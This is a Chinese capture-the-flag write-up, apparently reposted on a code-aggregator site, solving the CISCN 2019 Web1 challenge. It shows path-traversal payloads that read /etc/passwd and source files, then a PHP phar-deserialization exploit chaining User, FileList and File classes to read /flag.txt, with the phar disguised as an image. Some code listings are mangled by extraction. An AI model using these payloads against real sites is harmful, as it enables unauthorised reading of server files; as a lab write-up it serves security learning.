码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • [CISCN 2019华北Day1]Web1


    文章目录

      • 涉及知识点
      • 解题过程


    涉及知识点

    1. phar反序列化
    2. 文件读取

    解题过程

    打开题目,注册用户为admin
    进去发现有文件上传的功能,我们随便上传个图片
    然后就有下载和删除两个功能
    在这里插入图片描述
    我们尝试抓包下载文件的功能
    发现参数可控,我们尝试读取一下

    filename=/etc/passwd
    
    • 1

    在这里插入图片描述既然能读出来,我们继续读一下源码

    filename=../../index.php
    
    • 1

    源码

    
    
    
    
    
    
    
    
    网盘管理
    
    
        
        
        
        
        
        
    
    
    
        
    1. 管理面板
    2. 你好
    Name(); $a->Size(); ?>
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43

    继续读取class.php

    db = $db;
        }
    
        public function user_exist($username) {
            $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
            $stmt->bind_param("s", $username);
            $stmt->execute();
            $stmt->store_result();
            $count = $stmt->num_rows;
            if ($count === 0) {
                return false;
            }
            return true;
        }
    
        public function add_user($username, $password) {
            if ($this->user_exist($username)) {
                return false;
            }
            $password = sha1($password . "SiAchGHmFx");
            $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
            $stmt->bind_param("ss", $username, $password);
            $stmt->execute();
            return true;
        }
    
        public function verify_user($username, $password) {
            if (!$this->user_exist($username)) {
                return false;
            }
            $password = sha1($password . "SiAchGHmFx");
            $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
            $stmt->bind_param("s", $username);
            $stmt->execute();
            $stmt->bind_result($expect);
            $stmt->fetch();
            if (isset($expect) && $expect === $password) {
                return true;
            }
            return false;
        }
    
        public function __destruct() {
            $this->db->close();
        }
    }
    
    class FileList {
        private $files;
        private $results;
        private $funcs;
    
        public function __construct($path) {
            $this->files = array();
            $this->results = array();
            $this->funcs = array();
            $filenames = scandir($path);
    
            $key = array_search(".", $filenames);
            unset($filenames[$key]);
            $key = array_search("..", $filenames);
            unset($filenames[$key]);
    
            foreach ($filenames as $filename) {
                $file = new File();
                $file->open($path . $filename);
                array_push($this->files, $file);
                $this->results[$file->name()] = array();
            }
        }
    
        public function __call($func, $args) {
            array_push($this->funcs, $func);
            foreach ($this->files as $file) {
                $this->results[$file->name()][$func] = $file->$func();
            }
        }
    
        public function __destruct() {
            $table = '
    '; $table .= ''; foreach ($this->funcs as $func) { $table .= ''; } $table .= ''; $table .= ''; foreach ($this->results as $filename => $result) { $table .= ''; foreach ($result as $func => $value) { $table .= ''; } $table .= ''; $table .= ''; } echo $table; } } class File { public $filename; public function open($filename) { $this->filename = $filename; if (file_exists($filename) && !is_dir($filename)) { return true; } else { return false; } } public function name() { return basename($this->filename); } public function size() { $size = filesize($this->filename); $units = array(' B', ' KB', ' MB', ' GB', ' TB'); for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024; return round($size, 2).$units[$i]; } public function detele() { unlink($this->filename); } public function close() { return file_get_contents($this->filename); } } ?>
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79
    • 80
    • 81
    • 82
    • 83
    • 84
    • 85
    • 86
    • 87
    • 88
    • 89
    • 90
    • 91
    • 92
    • 93
    • 94
    • 95
    • 96
    • 97
    • 98
    • 99
    • 100
    • 101
    • 102
    • 103
    • 104
    • 105
    • 106
    • 107
    • 108
    • 109
    • 110
    • 111
    • 112
    • 113
    • 114
    • 115
    • 116
    • 117
    • 118
    • 119
    • 120
    • 121
    • 122
    • 123
    • 124
    • 125
    • 126
    • 127
    • 128
    • 129
    • 130
    • 131
    • 132
    • 133
    • 134
    • 135
    • 136
    • 137
    • 138
    • 139
    • 140
    • 141
    • 142
    • 143

    分析一下class.php
    我们先找到出口File.close()的file_get_contents。如果要调用close()方法,往前推可以找到User.__destruct(),但是这个是调用$db并不是调用File的。

    所以我们转换思路,我们可以利用FileList.__call()魔术方法当跳板调用
    仔细分析下

    public function __call($func, $args) {
            array_push($this->funcs, $func);
            foreach ($this->files as $file) {
                $this->results[$file->name()][$func] = $file->$func();
            }
        }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    首先接受两个参数,$func 表示调用的方法名,$args 是一个数组,包含传递给方法的参数。
    如果调用close()的话,就是先将方法名存储$this->funcs数组里然后依次调用$this->files数组里的元素的close()方法。
    然后存储在$this->results[$file->name()][$func]如果是File类的close(),就是获取文件的内容,所以$this->files数组里的元素必须为File类的对象

    再看看

    public function __destruct() {
        $table = '
    ' . htmlentities($func) . 'Opt
    ' . htmlentities($value) . '下载 / 删除
    '; $table .= ''; foreach ($this->funcs as $func) { $table .= ''; } $table .= ''; $table .= ''; foreach ($this->results as $filename => $result) { $table .= ''; foreach ($result as $func => $value) { //遍历数组 $func为键 $value为对应的值 $table .= ''; } $table .= ''; $table .= ''; } echo $table; }
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    这里先输出$this->funcs里的元素的值
    然后输出$this->results数组里的数组元素的键值对
    而在__call()函数里我们存储的文件的内容就在$result as $func => $value的$value里
    所以只要构造$this->files的值,就可以在最后面输出其文件的内容,这样就可以获得flag
    exp

    files=array();
            $a=new File('/flag.txt');
            array_push($this->files,$a);
        }
    
    }
    
    class File {
        public $filename;
        public function __construct($filename) {
            $this->filename = $filename;  
        }
    }
    
    $a=new User();
    $b=new FileList();
    $a->db=$b;
    $phar = new Phar("hacker.phar");
    $phar->startBuffering();
    $phar->setStub("");
    $phar->setMetadata($a);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
    ?>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36

    解释:
    $this->db为FileList类的对象,然后触发其中的__call()方法
    然后$this->db的$this->files数组成员的元素设置为File类的对象,
    调用File类的close()方法,并存储在$this->db的$this->results数组中
    最后在FileList类的析构函数输出其值

    生成phar文件后修改后缀为jpg(因为会被检测文件后缀)
    这里有个关键点,就是要在delete.php抓包修改参数

    原因:由于是使用文件系统函数(Filesystem),而在download.php存在open_basedir的限制,不能读取根目录文件而delete.php不存在这个限制

    在这里插入图片描述

  • 相关阅读:
    Nacos支持https
    logcat 只打印符合包名的log
    chales 重写/断点/映射/手机代理/其他主机代理
    IVariantArray的注意事项:AE 调用GP工具方法介绍及常见错误“对 COM 组件的调用返回了错误 HRESULTE_FAIL
    网络安全(黑客)自学
    k8s1.18.0完整部署教程
    C++ 带你吃透string容器的使用
    字符编码
    python中值滤波
    springboot11:原生组件注入
  • 原文地址:https://blog.csdn.net/m0_73512445/article/details/132747897
    • 最新文章
    • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
      用 Hashids 优雅解决 C 端自增 ID 暴露问题
      V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
      LLVM Pass快速入门(四):代码插桩
      milkup:桌面端 markdown AI续写和即时渲染
      基于项目工程构建SBOM(软件物料清单)的研究
      鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
      .NET 中如何快速实现 List 集合去重?
      扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
      浅谈数据访问层
    • 热门文章
    • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
      奉劝各位学弟学妹们,该打造你的技术影响力了!
      五年了,我在 CSDN 的两个一百万。
      Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
      面试官都震惊,你这网络基础可以啊!
      你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
      心情不好的时候,用 Python 画棵樱花树送给自己吧
      通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
      13 万字 C 语言从入门到精通保姆级教程2021 年版
      10行代码集2000张美女图,Python爬虫120例,再上征途
    小工具 小游戏
    Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

    京公网安备 11010502049817号

    ' . htmlentities($func) . 'Opt
    ' . htmlentities($value) . '下载 / 删除